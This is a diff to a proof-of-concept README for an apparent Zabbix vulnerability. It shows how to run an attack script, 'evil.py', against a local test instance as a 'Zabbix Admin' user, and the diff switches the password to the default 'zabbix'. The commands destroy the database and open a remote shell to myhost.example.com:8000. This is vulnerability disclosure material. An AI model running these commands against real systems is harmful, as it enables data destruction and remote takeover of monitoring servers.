paalbra/zabbix-zbxsec-7/README.md

 ## Proof-of-concept

 If you set up an instance with "zabbix-simple" you should have installed [pyzabbix](https://pypi.org/project/pyzabbix/), a user called "User" with the role "Zabbix Admin".
-The password of this user is "something-secret".
+The password of this user is the default password "zabbix".

 Destroy database:

 ```
-python evil.py --activate http://127.0.0.1:8080 User something-secret destroy-database
+python evil.py --activate http://127.0.0.1:8080 User zabbix destroy-database
 ```

 Remote shell connecting to myhost.example.com:8000:

 ```
-python evil.py --activate http://127.0.0.1:8080 User something-secret remote-shell myhost.example.com 8000
+python evil.py --activate http://127.0.0.1:8080 User zabbix remote-shell myhost.example.com 8000
 ```

 The trigger might need a few seconds/minutes to activate.